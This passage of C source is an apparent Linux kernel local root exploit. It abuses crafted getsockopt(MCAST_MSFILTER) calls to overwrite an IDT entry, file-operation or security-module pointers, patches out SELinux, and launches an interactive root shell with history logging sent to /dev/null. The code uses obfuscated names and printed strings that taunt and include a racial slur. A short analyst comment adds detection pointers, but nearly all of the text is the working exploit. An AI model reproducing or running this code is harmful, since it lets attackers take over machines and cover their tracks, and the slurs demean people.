  volatile char wizard;
  char cwd[1024];

  getcwd(cwd, sizeof(cwd));  
  strcat(cwd, "/__tmpfile");

  /* remove any stale copy, then create the backing file */
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1; 

  write(fd, (const void*)old, PAGE_SIZE); 
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;

  map = mmap((void*)old, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_EXEC, 
                   MAP_PRIVATE|MAP_FIXED, 
                   fd,0);
  if(map == MAP_FAILED)
    return -1; 

  /* avoid lazy page fault handler 
   * Triple Fault when using idt vector 
   * and no pages are already mapped:)
   */

  wizard = *((char*)old);
  unlink(cwd);
  return wizard; 
}


/*
 * Analyst note: overall flow of the program, as far as this page shows it.
 *
 *  1. Prints BANNER, records the caller's uid, runs env_prepare() to pick a
 *     technique path (IDT, fops or LSM).
 *  2. Maps two fixed user-space pages (y0y0stack, y0y0code).
 *  3. Patches the constant J0J0R00T into the first-stage buffer for the
 *     chosen path, optionally adds the SELinux/audit part, and copies the
 *     buffer to J0J0S. Copies a second-stage buffer to J0J0R00T.
 *  4. Opens a UDP socket and prepares the getsockopt argument block.
 *  5. Uses repeated raw getsockopt(SOL_IP, MCAST_MSFILTER) calls with crafted
 *     length values, then performs one action per path (software interrupt
 *     0xdd, poll() on TMAGIC_66TDFDRTS, or msgctl(IPC_RMID)).
 *  6. If getuid() now returns 0, forks an interactive /bin/sh with an
 *     environment that suppresses shell history.
 *
 * The vulnerability identifier is not given on this page; the durable fix is
 * a kernel that contains the corresponding patch.
 *
 * Detection and response pointers grounded in the code below:
 *  - a process whose uid becomes 0 without executing a setuid binary;
 *  - a child "/bin/sh -i" started with HISTFILE=/dev/null and
 *    HISTFILESIZE=0 in its environment;
 *  - an unprivileged process reading KALLSYMS or /boot/System.map-* shortly
 *    before creating MAP_FIXED mappings and a UDP socket;
 *  - the leetspeak status strings, which appear as literals in this source.
 *
 * NOTE(review): the helper macros/functions __pppp_tegddewyfg,
 * __gggdfstsgdt_dddex, __dhdyetgdfstreg__, __xxxfdgftr_hshsgdt and getidt are
 * defined outside this view; the descriptions here rely only on how they are
 * called.
 */
int main(int argc, char*argv[])
{
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb;
  struct pollfd pfd;


  printf(BANNER);

  /* uid of the invoking user, later patched into the standard payload */
  uid = getuid();

  env_prepare(argc, argv);

  y0y0stack(); 
  y0y0code();

  /* stage buffers: one layout for the IDT path, one for fops/LSM */
  if(useidt)
  {
    idtb = getidt();
    __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n");   
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

    __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");

    if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
    {
      __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }

    __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  }
  else if(usefops || uselsm)
  {
    __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n");   
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

    __setmcbuffer(J0J0S);

    __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
    {
        __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
  p4tch_sel1nux_codztegfaddczda(curr_target);
    } 
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }



  /* set shellcode level 2 */
  if(flags & KERN_DGGDYDTEGGETFDRLAK)
  {
    __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  }
  else
  {
    __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
  }

  /* plain UDP socket; only used as the target of the getsockopt calls */
  __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
    __xxxfdgftr_hshsgdt("socket");

  fillsocketcallAT();


#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n");
#endif

  if(useidt)
  {

    /* entry for vector 0xdd, computed from the IDT base */
    __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));

    sleep(1);
    asm volatile("int $0xdd\t\n");
  }
  else if(usefops)
  {
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); 

    __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);

    /* TMAGIC_66TDFDRTS is defined outside this view */
    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if(fd < 0)
      __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");

    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
  }
  else if(uselsm)
  {
    int msqid;
    /* one slot in each of the three security-operations tables */
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);


    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");


    /* each slot is handled as two 4-byte halves: J0J0S, then 0 */
    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);


    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);


    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);


    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
  }

  munmap((void*)Y0Y0CMAP, PAGE_SIZE);

  /* exec */
  /* success test: the process's own uid is re-read and compared with 0 */
  if(getuid() == 0)
  {
    pid_t pid;
    __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n");
    pid = fork();
    if(pid == 0)
    {
      /* the environment below points every history variable at /dev/null,
       * so the spawned shell leaves no history file behind */
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
                      "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
    } 
    else  
    {
      int status;
      waitpid(pid, &status, 0);
    }
  }
  else
    __pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n");

  close(s);
  return 0;
}
